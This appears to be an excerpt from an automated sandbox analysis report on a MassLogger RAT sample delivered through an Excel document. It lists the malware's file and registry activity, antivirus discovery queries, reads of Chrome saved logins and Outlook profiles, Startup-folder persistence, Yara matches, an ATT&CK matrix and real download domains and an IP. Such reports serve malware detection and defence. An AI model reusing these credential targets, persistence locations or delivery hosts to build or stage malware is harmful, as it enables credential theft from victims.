                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\ProgramData\a.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe VolumeInformation
                  Source: C:\ProgramData\a.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                  Source: a.exe, 0000000B.00000002.771565710.0000000000DC7000.00000004.00000001.sdmp, a.exe, 00000011.00000002.839119724.0000000000C8A000.00000004.00000001.sdmpBinary or memory string: \??\C:\Program Files (x86)\AVG\Antivirus\AVGUI.exe
                  Source: a.exe, 00000001.00000002.709230972.0000000000BC7000.00000004.00000001.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                  Source: a.exe, 00000001.00000002.709683488.00000000027FE000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.774809994.0000000002CFC000.00000004.00000001.sdmp, a.exe, 00000011.00000002.844042385.0000000002A53000.00000004.00000001.sdmpBinary or memory string: e.C:\Program Files (x86)\AVG\Antivirus\AVGUI.exe
                  Source: a.exe, 00000001.00000002.709683488.00000000027FE000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.774809994.0000000002CFC000.00000004.00000001.sdmp, a.exe, 00000011.00000002.844042385.0000000002A53000.00000004.00000001.sdmpBinary or memory string: e(C:\Program Files\AVG\Antivirus\AVGUI.exe
                  Source: C:\ProgramData\a.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct

                  Stealing of Sensitive Information:

                  barindex
                  Yara detected MassLogger RATShow sources
                  Source: Yara matchFile source: 0000000B.00000002.777758927.0000000003B6D000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000D.00000002.947711194.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.710965832.0000000003A90000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.710604971.0000000003889000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.853281517.00000000039A1000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.775905725.0000000003969000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.858549049.0000000003C8C000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.775433502.0000000003881000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.854642346.0000000003A89000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000014.00000002.866618994.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: a.exe PID: 5036, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: a.exe PID: 6200, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: a.exe PID: 5508, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: a.exe PID: 6772, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: a.exe PID: 740, type: MEMORY
                  Source: Yara matchFile source: 1.2.a.exe.39bc1e0.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.a.exe.3a9c1e0.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.a.exe.3a9c240.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.a.exe.3bbc1e0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.a.exe.3a89990.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.a.exe.3a9c1e0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.a.exe.3889990.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 20.2.a.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.a.exe.3b7c240.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.a.exe.3969990.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.a.exe.3b7c240.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.a.exe.39bc1e0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.a.exe.3c9c240.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.a.exe.3c9c240.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.a.exe.3a9c240.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 13.2.a.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.a.exe.3bbc1e0.2.unpack, type: UNPACKEDPE
                  Tries to harvest and steal browser information (history, passwords, etc)Show sources
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Tries to steal Mail credentials (via file access)Show sources
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: Yara matchFile source: 00000014.00000002.870308701.0000000002EE1000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000D.00000002.952842213.0000000002DF1000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: a.exe PID: 5036, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: a.exe PID: 5508, type: MEMORY

                  Remote Access Functionality:

                  barindex
                  Yara detected MassLogger RATShow sources
                  Source: Yara matchFile source: 0000000B.00000002.777758927.0000000003B6D000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000D.00000002.947711194.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.710965832.0000000003A90000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.710604971.0000000003889000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.853281517.00000000039A1000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.775905725.0000000003969000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.858549049.0000000003C8C000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.775433502.0000000003881000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.854642346.0000000003A89000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000014.00000002.866618994.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: a.exe PID: 5036, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: a.exe PID: 6200, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: a.exe PID: 5508, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: a.exe PID: 6772, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: a.exe PID: 740, type: MEMORY
                  Source: Yara matchFile source: 1.2.a.exe.39bc1e0.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.a.exe.3a9c1e0.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.a.exe.3a9c240.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.a.exe.3bbc1e0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.a.exe.3a89990.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.a.exe.3a9c1e0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.a.exe.3889990.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 20.2.a.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.a.exe.3b7c240.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.a.exe.3969990.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.a.exe.3b7c240.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.a.exe.39bc1e0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.a.exe.3c9c240.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.a.exe.3c9c240.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.a.exe.3a9c240.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 13.2.a.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.a.exe.3bbc1e0.2.unpack, type: UNPACKEDPE

                  Mitre Att&ck Matrix

                  Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                  Valid AccountsWindows Management Instrumentation121Registry Run Keys / Startup Folder1Process Injection12Disable or Modify Tools1OS Credential Dumping1File and Directory Discovery2Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                  Default AccountsScripting22Boot or Logon Initialization ScriptsRegistry Run Keys / Startup Folder1Deobfuscate/Decode Files or Information1Input Capture1System Information Discovery25Remote Desktop ProtocolData from Local System1Exfiltration Over BluetoothEncrypted Channel12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                  Domain AccountsNative API1Logon Script (Windows)Logon Script (Windows)Scripting22Security Account ManagerQuery Registry1SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                  Local AccountsExploitation for Client Execution43Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information11NTDSSecurity Software Discovery341Distributed Component Object ModelInput Capture1Scheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
                  Cloud AccountsCommand and Scripting Interpreter1Network Logon ScriptNetwork Logon ScriptSoftware Packing2LSA SecretsVirtualization/Sandbox Evasion14SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol13Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                  Replication Through Removable MediaPowerShell1Rc.commonRc.commonMasquerading11Cached Domain CredentialsProcess Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                  External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion14DCSyncApplication Window Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                  Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection12Proc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                  Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowSystem Network Configuration Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 signatures2 2 Behavior Graph ID: 356267 Sample: LIQUIDACION INTERBANCARIA 0... Startdate: 22/02/2021 Architecture: WINDOWS Score: 100 68 Malicious sample detected (through community Yara rule) 2->68 70 Antivirus detection for URL or domain 2->70 72 Multi AV Scanner detection for dropped file 2->72 74 15 other signatures 2->74 10 EXCEL.EXE 78 53 2->10         started        15 a.exe 3 2->15         started        process3 dnsIp4 60 www.seyranikenger.com.tr 10->60 62 seyranikenger.com.tr 185.162.146.6, 443, 49731 BURSABILTR Turkey 10->62 42 C:\Users\user\...\mensajeria_system[1].exe, PE32 10->42 dropped 44 C:\ProgramData\a.exe, PE32 10->44 dropped 86 Document exploit detected (creates forbidden files) 10->86 88 Document exploit detected (process start blacklist hit) 10->88 90 Document exploit detected (UrlDownloadToFile) 10->90 17 a.exe 15 3 10->17         started        64 raw.githubusercontent.com 15->64 66 pastex.pro 15->66 21 a.exe 15->21         started        